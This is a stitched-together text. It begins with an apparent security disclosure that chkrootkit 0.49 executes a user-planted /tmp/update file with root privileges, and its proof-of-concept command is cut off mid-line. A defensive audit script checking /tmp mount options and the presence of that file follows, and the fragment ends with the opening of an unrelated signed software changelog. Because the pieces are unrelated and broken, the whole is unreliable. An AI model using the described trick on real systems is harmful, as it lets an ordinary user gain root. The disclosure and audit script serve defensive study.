Hi.
As ironic as it sounds, chkrootkit 0.49 can be turned into a rootkit.
On systems where /tmp is not mounted noexec, a regular user can create
a file /tmp/update which chkrootkit will execute with root privileges
each time it's run.
Here's a simple PoC...as normal user:
$ echo -e '#!/bin
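
A defensive check for the two conditions named in the message above, added here as an example (it is not part of the original post and is not chkrootkit code). It reads a mounts table in /proc/mounts format and reports whether /tmp lacks noexec and whether the candidate file exists; the function names and the exit-code scheme are assumptions of this example.

```sh
#!/bin/sh
# Audit a host for the exposure described above: /tmp mounted without
# noexec, and a file named /tmp/update present before chkrootkit runs.
# Paths are parameters so the checks can be run on constructed input.

# tmp_is_noexec MOUNTS_FILE [MOUNTPOINT]
# Returns 0 if the mount entry for MOUNTPOINT carries the noexec option.
# If MOUNTPOINT has no entry of its own, the options of "/" are used.
tmp_is_noexec() {
    t_mounts=${1:-/proc/mounts}
    t_mp=${2:-/tmp}
    # /proc/mounts fields: device mountpoint fstype options dump pass
    t_opts=$(awk -v mp="$t_mp" '
        $2 == "/" { r = $4 }
        $2 == mp  { o = $4 }
        END       { print (o != "" ? o : r) }' "$t_mounts")
    case ",$t_opts," in
        *,noexec,*) return 0 ;;
        *)          return 1 ;;
    esac
}

# audit_tmp_update MOUNTS_FILE CANDIDATE
# Exit status is a bit mask: 1 = /tmp allows execution,
# 2 = CANDIDATE exists (regular file, symlink or anything else).
audit_tmp_update() {
    a_mounts=${1:-/proc/mounts}
    a_file=${2:-/tmp/update}
    a_rc=0
    if ! tmp_is_noexec "$a_mounts" /tmp; then
        echo "WARN: /tmp is not mounted noexec"
        a_rc=$((a_rc + 1))
    fi
    if [ -e "$a_file" ] || [ -L "$a_file" ]; then
        # Numeric owner and mode show who planted the file.
        echo "ALERT: $a_file exists: $(ls -ldn "$a_file")"
        a_rc=$((a_rc + 2))
    fi
    return "$a_rc"
}

# Usage on a live system, e.g. from cron before chkrootkit is started:
#   audit_tmp_update /proc/mounts /tmp/update || echo "investigate"
```

A status of 3 means both conditions from the message hold at once; a status of 2 on a noexec /tmp still deserves a look, since the file has no business being there.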
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Wed Jun 4 23:23:05 UTC 2014
academic/calc: Updated for version 2.12.4.13 + new maintainer.
academic/gretl: Added (Econometric Analysis Software).
academic/mendeleydesktop: Updated for version 1.11.
desktop/dwm: Update README.CONFIG.
desktop/ee: Added